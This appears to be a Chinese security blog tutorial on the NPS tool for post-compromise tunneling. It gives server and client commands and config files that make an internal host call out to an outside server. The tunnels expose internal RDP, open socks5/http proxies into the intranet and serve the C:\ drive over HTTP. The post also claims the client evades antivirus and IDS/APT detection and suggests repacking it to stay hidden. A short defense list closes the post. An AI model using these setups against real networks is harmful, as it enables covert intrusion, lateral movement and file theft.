NPS詳情

  • 2019 年 10 月 5 日
  • 筆記

No.1

聲明

由於傳播、利用此文所提供的信息而造成的任何直接或者間接的後果及損失,均由使用者本人負責,雷神眾測以及文章作者不為此承擔任何責任。 雷神眾測擁有對此文章的修改和解釋權。如欲轉載或傳播此文章,必須保證此文章的完整性,包括版權聲明等全部內容。未經雷神眾測允許,不得任意修改或者增減此文章內容,不得以任何方式將其用於商業目的。

No.2

好用在哪?

使用方便

直接在server web中進行配置即可。

功能豐富

tcp/udp隧道端口轉發、socks5/http內網代理、內網文件訪問服務、p2p、域名解析(暫用不到)。

過殺軟

client目前還是過殺毒靜態檢測的。

數據壓縮

所有模式均支持snnapy形式的數據壓縮,壓縮後的流量有一定的繞過內網ips、ids、apt設備的能力。可通過配置文件設置。

tls加密傳輸

通信內容tls加密傳輸,有一定的繞過防火牆流量屏蔽與協議屏蔽的能力。可通過配置文件設置。

流暢

數據傳輸中經過snnapy壓縮,數據體積減小,client配置auto_reconnection後,連接中斷後可自動重新建立連接,一定程度避免一些代理工具代理緩慢、連接中斷問題。

長久性

代碼開源,客戶端即便被殺了,還可以改改代碼、加加殼繞一繞。@liu 在維護項目,期待更多功能上線。

No.3

服務端配置

nps server啟動

服務端運行nps test,無報錯後nps start啟動服務端。

nps server添加client

隨便填就行,client config文件用得到,socks5、http代理時候需要用到basic認證帳號密碼。

client狀態:

得到客戶端啟動命令:

./npc -server=x.x.x.x:8024 -vkey=adminkey -type=tcp

No.4

客戶端配置

客戶端啟動配置兩種:無配置文件、有配置文件。其一即可。

註:server ip 以x.x.x.x代替。

無配置文件啟動

使用./npc -server=x.x.x.x:8024 -vkey=adminkey -type=tcp命令啟動即可。

360兩件套對npc.exe文件和tcp連接無告警。

獲取到客戶端連接。

有配置文件啟動

使用./npc -config=npc config file加載配置文件啟動。

全局配置項:

[common]

server_addr=x.x.x.x:8024

# server中監聽地址和端口

conn_type=tcp

vkey=adminkey

# server配置的客戶端密鑰

auto_reconnection=true

# 斷線重連,比較好用

max_conn=1000

flow_limit=1000

rate_limit=1000

basic_username=admink

# server配置的basic用戶名,用於http、socks5代理認證basic_password=admink

# server配置的basic密碼,用於http、socks5代理認證web_username=user

# web登錄帳號,這個不用了

web_password=1234

# web登錄密碼,這個也不用了

crypt=true

# 是否加密傳輸

compress=true

# 是否壓縮傳輸

No.5

TCP/UDP隧道配置

TCP隧道

兩種配置方式:server web配置和client config文件配置。其一即可。

1、server web配置

增加tcp隧道:

隧道建立後,連接server ip x.x.x.x的7000端口,即連接到內網172.16.58.145的3389端口。

net 連接:

2、client config文件配置

config文件在nps client啟動時加載即可。

[common]

server_addr=x.x.x.x:8024

conn_type=tcp

vkey=adminkey

auto_reconnection=true

crypt=true

compress=true

[tcp]

mode=tcp

target_addr=172.16.58.145:3389

server_port=7000

client 的config文件無法重載,故,只能啟動時候加載上所有配置,不建議用config文件方式進行隧道配置,不靈活,推薦使用server web配置方式。

UDP隧道

UDP隧道配置和TCP過程一樣,mode改成UDP即可。

No.6

socks5/http內網代理

socks5內網代理

兩種配置方式:server web配置和client config文件配置。其一即可。

1、server web配置

增加socks5:

代理設置完畢後,連接server ip x.x.x.x的9000端口即可代理到內網中。

在nps server添加client時,設置了basic權限認證admink/admink,部分瀏覽器插件如SwitchyOmega不支持s5的basic認證,建議使用proxychains進行代理。

proxychains配置:

socks5x.x.x.x9000adminkadmink

代理web:

代理rdp:

net 連接:

2、client config文件配置

config文件在nps client啟動時加載即可。

[common]

server_addr=x.x.x.x:8024

conn_type=tcp

vkey=adminkey

auto_reconnection=true

basic_username=admink

basic_password=admink

crypt=true

compress=true

[socks5]

mode=socks5

server_port=9000

client 的config文件無法重載,故,只能啟動時候加載上所有配置,不建議用config文件方式進行socks5代理配置,不靈活,推薦使用server web配置方式。

http內網代理

http內網代理和socks5過程一樣,mode改成httpProxy即可。

No.7

內網文件訪問服務

內網文件訪問配置只能在client config中進行。

config文件在nps client啟動時加載即可。

[common]

server_addr=x.x.x.x:8024

conn_type=tcp

vkey=adminkey

auto_reconnection=true

basic_username=admink

basic_password=admink

crypt=truecompress=true

[file]mode=file

server_port=8888

local_path=C:\

strip_pre=/fileservice/

ocal_path配置內網機要設置文件服務的目錄。

server_port配置一個server ip上的端口。

strip_pre配置訪問文件服務的path。

成功啟動:

瀏覽器中訪問:http://x.x.x.x:8888/fileservice/

目前只能做文件訪問,還做不到文件管理。

No.8

防禦方案

  1. 加強內網攻擊檢測
  2. 部署apt設備和蜜罐設備
  3. 捕捉內網攻擊行為

END